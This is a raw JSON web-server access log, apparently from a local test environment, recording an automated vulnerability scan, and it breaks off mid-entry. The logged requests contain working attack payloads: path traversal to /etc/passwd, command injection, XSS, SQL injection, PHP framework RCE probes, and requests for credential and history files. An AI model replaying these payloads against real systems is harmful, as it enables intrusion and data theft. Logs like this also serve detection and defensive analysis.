+{"@timestamp": "03/May/2022:18:03:25 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /error/error.log HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.313","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:25 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /.zsh_history HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.332","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:25 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /.user.ini HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.609","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:25 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /index HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.392","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:25 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /glpi2/status.php HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.421","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:25 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /127.0.0.1_db.sql HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.308","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:25 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"http:","request":"GET /cs/Satellite?destpage=\x22&pagename=OpenMarket%2FXcelerate%2FUIFramework%2FLoginError HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.314","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:25 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /api/v4/users/80 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.064","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:25 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/embed-swagger/swagger-iframe.php?url=xss://%22-alert(document.domain)-%22 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.400","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:25 +0000","request_body":"28fHqLuIvh9079N2BUCu45nL800","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"PUT /fileserver/test.txt HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.401","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"PUT", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:25 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /_vti_inf.html HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.445","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:25 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /console/ HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.447","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:26 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /webmail/old/calendar/minimizer/index.php?script=...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2fetc%2fpasswd HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.371","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:26 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /CFIDE/componentutils/login.cfm HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.706","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:26 +0000","request_body":"Command=Diagnostic&traceMode=trace&reportIpOnly=0&pingPktSize=56&pingTimeout=30&pingCount=4&ipAddr=&maxTTLCnt=30&queriesCnt=;cat /etc/passwd&reportIpOnlyCheckbox=on&btnApply=Apply&T=1631653402928","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.372","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"http://127.0.0.1/diagnostic.html?t=201701020919", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:26 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /?s=index/think\x5Capp/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.159","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:26 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /responsiveUI/webmail/folder.xhtml HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.318","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:26 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /file=C:%5CWindows%5Cwin.ini HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.213","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:26 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET ///etc.children.json?FNZ.css HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.415","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:26 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /https:/%5C/%5Cexample.com HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.300","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:26 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /v3/graphql/schema.json HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.468","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:26 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /errors.log HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.457","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:26 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /localhost.sql HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.340","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:26 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /console/ HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.318","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:26 +0000","request_body":"SAMLResponse=%22%3E%3Csvg/onload=alert(/28fHqXWBv2UNvQIlDq8FuzfbMcC/)%3E","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /+CSCOE+/saml/sp/acs?tgname=a HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.319","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:26 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /web/database/manager HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.381","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:26 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /emergency.php HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.461","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:26 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /api/v4/users/81 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.460","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:26 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /cfide/componentutils/login.cfm HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.401","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:26 +0000","request_body":"connection=basic&userName=admin%27%22%29%3B%7D%3C%2Fscript%3E%3Cscript%3Ealert%28%2728fHqXrFIsth8dCzV2CllSikjaQ%27%29%3C%2Fscript%3E&pw=nordex&language=en","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /login HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.780","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:26 +0000","request_body":"log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /wp-login.php HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.774","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:26 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /mobile/index.php HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.403","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:26 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /if.cgi?redirect=setting.htm&failure=fail.htm&type=ap_tcps_apply&TF_ip=443&TF_submask=0&TF_submask=%22%3E%3Cscript%3Ealert%2828fHqV2fAz2pyC7hybSILqEYZvx%29%3C%2Fscript%3E&radio_ping_block=0&max_tcp=3&B_apply=APPLY HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.418","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:26 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /webmail/old/calendar/minimizer/index.php?style=...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2fetc%2fpasswd HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.419","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:26 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET ///etc.children.json?FNZ.ico HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.387","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:26 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /maint/modules/home/index.php?lang=english|cat%20/etc/passwd HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.453","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:26 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /https:/%5Cexample.com HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.366","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:26 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /api/v1/namespaces/kube-system/secrets/kubernetes-dashboard-certs HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.448","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:26 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /error.log HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.389","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:26 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /index.php/install HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.743","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:26 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /cgi-bin/guestimage.html HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.394","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:26 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /actions/seomatic/meta-container/meta-link-container/?uri={{228*'98'}} HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.827","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:26 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"-","request":"GET /.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/var/www/html/index.html HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.000","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:26 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /console/ HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.523","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:26 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /.vscode/ HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.409","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:26 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /index.php?p=banlist&advSearch=0%27%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&advType=btype HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.457","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:26 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /pages/sdcall/Login.jsp HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.367","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:26 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /phpmyadmin/ HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.867","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:26 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /adminer.php HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.480","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:26 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_zimbcomment&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.496","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:26 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET ///etc.children.json?FNZ.html HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.457","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:26 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /v3/graphql/schema.xml HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.796","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:27 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /actuator/jolokia/read/JMImplementation:type=MBeanServerDelegate/ImplementationName HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.270","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:27 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /mysqldump.sql HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.754","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:27 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /concrete5/index.php/install HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.387","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:27 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /error.txt HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.454","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:27 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /fileserver/test.txt HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.152","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:27 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /backup/auto.php?password=NzbwpQSdbY06Dngnoteo2wdgiekm7j4N&path=../backup/auto.php HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.371","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:27 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /admin/?n=product&c=product_admin&a=dopara&app_type=shop&id=1%20union%20SELECT%201,2,3,25367*75643,5,6,7%20limit%205,1%20%23 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.420","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:27 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /console/ HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.416","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:27 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /horde/util/barcode.php?type=../../../../../../../../../../../etc/./passwd%00 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.416","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:27 